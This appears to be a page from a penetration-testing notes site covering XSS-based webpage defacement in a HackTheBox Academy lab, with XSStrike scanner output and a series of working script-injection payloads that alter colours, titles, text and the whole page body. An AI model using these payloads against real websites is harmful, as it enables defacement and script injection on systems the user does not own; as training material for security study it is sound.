WEBPAGE DEFACEMENT

IDENTIFY XSS VULNERABLE INPUT FIELDS

#perform code review
root@oco:~$ BROWSER > {targetSite:port} > CTRL + U
 * review the HTML source and identify parameters
 * also review the .js file

#verify by entering data in the form fields
root@oco:~$ BROWSER > {targetSite:port} > F12
 input fields: fill in data
 * copy the full URL to identify GET request parameters
    - http://94.237.60.32:30702/index.php?fullname=bughunter&username=bugger&password=password&email=email%40null.com
       - fullname, username, password, email 

#perform automated discovery
root@oco:~$ ./xsstrike.py -u "http://94.237.60.32:30702/index.php?fullname=bughunter&username=bugger&password=password&email=email%40null.com"
 XSStrike v3.1.5
  [~] Checking for DOM vulnerabilities 
  [+] WAF Status: Offline 
  [!] Testing parameter: fullname 
  [-] No reflection found 
  [!] Testing parameter: username 
  [-] No reflection found 
  [!] Testing parameter: password 
  [-] No reflection found 
  [!] Testing parameter: email 
  [!] Reflections found: 1 
  [~] Analysing reflections 
  [~] Generating payloads 
  [!] Payloads generated: 3072 
  ------------------------------------------------------------
  [+] Payload: <hTML%0donpoiNtEreNtER+=+(prompt)``// 
  [!] Efficiency: 100 
  [!] Confidence: 10 
  [?] Would you like to continue scanning? [y/N]
  
#manually verify the identified parameter
root@oco:~$ BROWSER > http://94.237.60.32:30702/index.php?fullname=bughunter&username=bugger&password=password&email=<hTML%0donpoiNtEreNtER+=+(prompt)``//
 * a prompt will be displayed

METHODS

CHANGING WEBPAGE BACKGROUND COLOR

root@oco:~$ BROWSER > {targetSite:port}
 input field: <script>document.body.style.background = "#FFFF23"</script>
 * ALT: input field: <script>document.body.style.background = "purple"</script>
    - the alt method uses named color instead of HEX RGB values

SETTING AN IMAGE TO THE BACKGROUND

root@oco:~$ BROWSER > {targetSite:port}
 input field: <script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>

SETTING PAGE TITLE

root@oco:~$ BROWSER > {targetSite:port}
 input field: <script>document.title = 'HackTheBox Academy'</script>

CHANGING PAGE TEXT

root@oco:~$ BROWSER > {targetSite:port}
 input field: <script>document.getElementById("todo").innerHTML = "New Text"</script>
 * ALT: <script>$("#todo").html('New Text');</script>
    - the alt method uses jQuery functions

CHANGING THE ENTIRE HTML CODE OF THE MAIN BODY

root@oco:~$ BROWSER > {targetSite:port}
 input field: <script>document.getElementsByTagName('body')[0].innerHTML = "New Text"</script>
 * this is what hacking groups typically use by leaving a simple message on the web page 
 * by specifying [0], the document.getElementByTagName() function will select the first body
   element, which should change the entire text of the web page

FULL IMPLEMENTATION

#prepare HTML code locally to see how it'll look
root@oco:~$ nano defacement
  <center>
    <h1 style="color: white">Cyber Security Training</h1>
    <p style="color: white">by 
      <img src="https://academy.hackthebox.com/images/logo-htb.svg" height="25px" alt="HTB Academy"></p>
  </center>

#minify the HTML code
root@oco:~$ BROWSER > https://www.toptal.com/developers/html-minifier
 input: ...HTML code...
 output: ...minified HTML code...
 
root@oco:~$ BROWSER > {targetSite:port}
 input field: <script>document.getElementsByTagName('body')[0].innerHTML = '<center><h1 style="color: white">Cyber Security Training</h1><p style="color: white">by <img src="https://academy.hackthebox.com/images/logo-htb.svg" height="25px" alt="HTB Academy" /> </p></center>'</script>
 * the custom HTML code will now be permanently part of the web page's source code 
   and will be shown to anyone who visits the page
 * when viewing the page's source, the original target's HTML source code will still 
   exist, and the attacker's injected payloads appear at the end

PreviousXSS PAYLOADS NextXSS PHISHING

Last updated 1 year ago